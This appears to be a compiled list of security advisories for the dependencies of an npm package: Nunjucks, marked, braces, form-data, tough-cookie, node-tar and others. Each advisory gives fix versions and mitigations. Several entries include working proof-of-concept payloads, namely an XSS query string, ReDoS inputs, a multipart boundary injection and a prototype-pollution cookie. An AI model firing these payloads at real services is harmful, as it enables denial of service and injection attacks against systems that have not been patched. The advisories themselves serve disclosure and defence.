All vulnerabilities related to version 1.0.0 of the package
Nunjucks autoescape bypass leads to cross site scripting
In Nunjucks versions prior to 3.2.4, it was possible to bypass the restrictions provided by the autoescape functionality. If two user-controlled parameters were used on the same line in a view, it was possible to inject cross site scripting payloads using the backslash \ character.
If the user-controlled parameters were used in a view similar to the following:
<script>
let testObject = { lang: '{{ lang }}', place: '{{ place }}' };
</script>
It is possible to inject an XSS payload using the following parameters:
https://<application-url>/?lang=jp\&place=};alert(document.domain)//
The issue was patched in version 3.2.4.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching keeps backtracking over the input while it fails to find the closing bracket. As the input size increases, processing time also increases until the application hangs or slows down. A fix was merged, but further testing showed the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. The issue should be mitigated by using a safe pattern that does not start backtracking the regular expression due to greedy matching.
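A minimal timing sketch of the behavior described above; the payload shape below is an illustrative assumption, not the published PoC. On a vulnerable version, the time taken by micromatch.braces() should grow steeply with the length of an attacker-controlled pattern.
const micromatch = require('micromatch');

for (const n of [1000, 2000, 4000, 8000]) {
  // Hypothetical payload: a long run of characters with an unclosed brace,
  // intended to keep the greedy .* match backtracking for a closing bracket.
  const payload = '{' + 'a'.repeat(n) + ',';
  const start = process.hrtime.bigint();
  try {
    micromatch.braces(payload);
  } catch (err) {
    // parse errors are irrelevant here; only the elapsed time matters
  }
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  console.log(`n=${n}: ${ms.toFixed(1)} ms`);
}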
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to memory exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parser enters a loop that allocates heap memory without freeing it at any point in the loop. Eventually, the JavaScript heap limit is reached and the program crashes.
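A rough illustration of the imbalanced-braces input described above. Against a vulnerable braces version this may allocate memory until the heap limit is hit and the process crashes, so treat it strictly as a demonstration.
const braces = require('braces');

const malicious = '{'.repeat(500000); // imbalanced: opening braces only
console.log('heap before:', process.memoryUsage().heapUsed);
try {
  braces(malicious); // may hang or exhaust the heap on vulnerable versions
} catch (err) {
  console.error('parse failed:', err.message);
}
console.log('heap after:', process.memoryUsage().heapUsed);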
Improper Certificate Validation in node-sass
Certificate validation in node-sass 2.0.0 to 6.0.1 is disabled when requesting binaries even if the user is not specifying an alternative download path.
Uncontrolled Resource Consumption in trim-newlines
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has a regular expression denial-of-service (ReDoS) issue in the .end() method.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
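Since the package is unmaintained, migrating away from it is the real fix. As an interim sketch (using request's documented ability to pass a function as followRedirect; the target URL is a placeholder), cross-protocol redirects can be refused before they are followed:
const request = require('request');

const target = 'https://example.com/resource';
const targetProtocol = new URL(target).protocol;

request({
  url: target,
  followRedirect: (response) => {
    // Only follow absolute redirects that keep the original protocol.
    // (Conservative: relative Location headers are also refused.)
    const location = response.headers.location || '';
    return location.startsWith(targetProtocol + '//');
  }
}, (err, res) => {
  if (err) return console.error(err.message);
  console.log(res.statusCode);
});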
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker can observe other values produced by Math.random() in the target application and can control part of a request made using form-data.
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper-escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker, including by form-data itself: if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data (such as a user-controlled webhook), the attacker can observe the boundary values from those requests to recover the Math.random() outputs. A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend, and Math.random() is a fine place to get these sorts of IDs (in fact, OpenTelemetry uses Math.random() for this purpose).
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must use form-data to send data, including user-controlled data, to some other system, and the attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to that request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array). If an application is vulnerable, this allows an attacker to inject additional, attacker-controlled parameters into the request.
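A minimal sketch of why a predictable boundary matters; the field names and injected content below are illustrative assumptions. Once the boundary is known, a user-controlled value that embeds it closes the current part and smuggles in an extra field.
const FormData = require('form-data');

const form = new FormData();
const boundary = form.getBoundary(); // what the attacker predicts via Math.random()

// A "user-controlled" value embedding the predicted boundary, which terminates
// the current part and injects an additional, attacker-controlled field.
const injected =
  'harmless text\r\n' +
  `--${boundary}\r\n` +
  'Content-Disposition: form-data; name="admin"\r\n' +
  '\r\n' +
  'true';

form.append('comment', injected);
form.append('user', 'alice');

// The serialized body now contains a third part named "admin" that the
// application never intended to send.
console.log(form.getBuffer().toString());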
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
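A hedged reproduction sketch based on the publicly described vector for this advisory; it only demonstrates the issue when run against a vulnerable tough-cookie release earlier than 4.1.3.
const { CookieJar } = require('tough-cookie');

// rejectPublicSuffixes=false is the vulnerable configuration named above.
const jar = new CookieJar(undefined, { rejectPublicSuffixes: false });

// A crafted Domain of "__proto__" causes the jar's plain-object index to
// write into Object.prototype on vulnerable versions.
jar.setCookieSync(
  'polluted=yes; Domain=__proto__; Path=/notauth',
  'https://__proto__/admin'
);

// On vulnerable versions this prints an object inherited from the polluted
// prototype; on patched versions it prints undefined.
console.log({}['/notauth']);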
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
Patched versions: 3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')

tar.x({
  file: 'archive.tgz',
  // either add this function...
  onentry: (entry) => {
    if (path.isAbsolute(entry.path)) {
      entry.path = sanitizeAbsolutePathSomehow(entry.path)
      entry.absolute = path.resolve(entry.path)
    }
  },
  // or this one
  filter: (file, entry) => {
    if (path.isAbsolute(entry.path)) {
      return false
    } else {
      return true
    }
  }
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
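A small illustration of that resolution behavior, runnable on any platform via path.win32 (the exact output on a real Windows system also depends on the per-drive working directory):
const path = require('path');

const extractionDir = 'D:\\extraction\\dir';
const entryPath = 'C:some\\path'; // drive-relative, not absolute

// Resolves onto the C: drive, outside D:\extraction\dir.
console.log(path.win32.resolve(extractionDir, entryPath));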
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
This only affects users of node-tar on Windows systems.
Patched versions: 4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense-in-depth check is added, such that if the entry.absolute is outside of the extraction target, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis of npm's node-tar package, I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder (a, b, and c) until it reaches the last folder and creates foo.txt. I noticed that there is no validation at all on the number of folders being created, so it is possible to consume the CPU and memory of the system running node-tar, and even crash the Node.js client within a few seconds, by using a path with too many sub-folders.
You can reproduce this issue by downloading the tar file provided in the resources and using node-tar to extract it; you should see the same behavior as in the video.
Here's a video showcasing the exploit:
Denial of service by crashing the Node.js client when attempting to parse a tar archive, making it run out of heap memory and consuming server CPU and memory resources.
This report was originally submitted to the GitHub bug bounty program; they asked me to report it to you a month ago.
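A possible hedged mitigation sketch, which is my own assumption rather than guidance from the advisory: alongside upgrading, cap the directory depth of extracted entries with a filter.
const tar = require('tar');

const MAX_DEPTH = 64; // illustrative limit on nesting

tar.x({
  file: 'archive.tgz',
  // Reject entries whose paths nest implausibly deep before extraction.
  filter: (entryPath) => entryPath.split('/').length <= MAX_DEPTH
});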
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
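A sketch of the vulnerable usage pattern together with a simple pre-check; the length cap is an illustrative assumption, not an official mitigation.
const semver = require('semver');

function safeRange(untrustedRange) {
  // Refuse absurdly long range strings before they reach the regex engine.
  if (typeof untrustedRange !== 'string' || untrustedRange.length > 256) {
    throw new Error('range string rejected');
  }
  return new semver.Range(untrustedRange); // the call named in the advisory
}

console.log(safeRange('>=1.2.3 <2.0.0').test('1.4.0')); // true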
Regular expression denial of service in scss-tokenizer
All versions of the package scss-tokenizer prior to 0.4.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase CPU usage and crash the program by supplying a very large, specially crafted string.
Uncontrolled Resource Consumption in markdown-it
Special patterns with length > 50K chars can slow down the parser significantly.
const md = require('markdown-it')();
md.render(`x ${' '.repeat(150000)} x \nx`);
Upgrade to v12.3.2+
There is no way to remediate this vulnerability without upgrading.
Fix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101
Regular Expression Denial of Service (ReDoS)
The is-svg package 2.1.0 through 4.2.1 for Node.js uses a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input.
ReDOS in IS-SVG
A vulnerability was discovered in is-svg version 4.3.1 and below where a Regular Expression Denial of Service (ReDoS) occurs if the application checks a crafted invalid SVG string.
Path Traversal in decompress
Versions of decompress prior to 4.2.1 are vulnerable to Arbitrary File Write. The package fails to prevent extraction of files with relative paths, allowing attackers to write to any folder in the system by including filenames containing ../.
Upgrade to version 4.2.1 or later.
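As a defense-in-depth sketch on top of upgrading (the filter logic is my assumption, not part of the advisory), entries that would resolve outside the output directory can be dropped:
const path = require('path');
const decompress = require('decompress');

const outDir = path.resolve('output');

decompress('archive.zip', outDir, {
  // Drop any entry whose resolved destination escapes the output directory.
  filter: (file) => {
    const dest = path.resolve(outDir, file.path);
    return dest === outDir || dest.startsWith(outDir + path.sep);
  }
}).then((files) => {
  console.log(`extracted ${files.length} entries`);
});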
Regular expression denial of service in url-regex
All versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
semver-regex Regular Expression Denial of Service (ReDOS)
npm semver-regex is vulnerable to Inefficient Regular Expression Complexity
Regular expression denial of service in semver-regex
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package when an attacker is able to supply arbitrary input to the test() method.
Got allows a redirect to a UNIX socket
The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.
sassdoc-extras vulnerable to prototype pollution
A Prototype Pollution vulnerability in the byGroupAndType function of sassdoc-extras v2.5.1 and before allows attackers to inject properties on Object.prototype via supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.
Inefficient Regular Expression Complexity in marked
What kind of vulnerability is it?
Denial of service.
The regular expression inline.reflinkSearch may cause catastrophic backtracking against some strings.
PoC is the following.
import * as marked from 'marked';
console.log(marked.parse(`[x]: x
\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`));
Who is impacted?
Anyone who runs untrusted markdown through marked and does not use a worker with a time limit.
Has the problem been patched?
Yes
What versions should users upgrade to?
4.0.10
Is there a way for users to fix or remediate the vulnerability without upgrading?
Do not run untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.
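A minimal sketch of that worker-with-a-time-limit approach; the inline worker source and the one-second limit are illustrative assumptions.
const { Worker } = require('worker_threads');

// Worker body kept inline (via eval) so the sketch is self-contained.
const workerSource = `
  const { parentPort, workerData } = require('worker_threads');
  const marked = require('marked');
  parentPort.postMessage(marked.parse(workerData));
`;

function renderWithTimeout(markdown, ms = 1000) {
  return new Promise((resolve, reject) => {
    const worker = new Worker(workerSource, { eval: true, workerData: markdown });
    const timer = setTimeout(() => {
      worker.terminate(); // kill the parse if it exceeds the time limit
      reject(new Error('markdown rendering timed out'));
    }, ms);
    worker.once('message', (html) => { clearTimeout(timer); resolve(html); });
    worker.once('error', (err) => { clearTimeout(timer); reject(err); });
  });
}

renderWithTimeout('# hello').then(console.log).catch(console.error);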
Regular Expression Denial of Service in marked
Affected versions of marked are vulnerable to Regular Expression Denial of Service (ReDoS). The _label subrule may significantly degrade parsing performance of malformed input.
Upgrade to version 0.7.0 or later.
Inefficient Regular Expression Complexity in marked
What kind of vulnerability is it?
Denial of service.
The regular expression block.def may cause catastrophic backtracking against some strings.
PoC is the following.
import * as marked from "marked";
marked.parse(`[x]:${' '.repeat(1500)}x ${' '.repeat(1500)} x`);
Who is impacted?
Anyone who runs untrusted markdown through marked and does not use a worker with a time limit.
Has the problem been patched?
Yes
What versions should users upgrade to?
4.0.10
Is there a way for users to fix or remediate the vulnerability without upgrading?
Do not run untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Regular Expression Denial of Service in string package
Affected versions of string are vulnerable to regular expression denial of service when specifically crafted untrusted user input is passed into the underscore or unescapeHTML methods.
There is currently no direct patch for this vulnerability.
Currently, the best solution is to avoid passing user input to the underscore and unescapeHTML methods.
Alternatively, a user-provided patch is available in Pull Request #217; however, this patch has not been tested, nor has it been merged by the package author.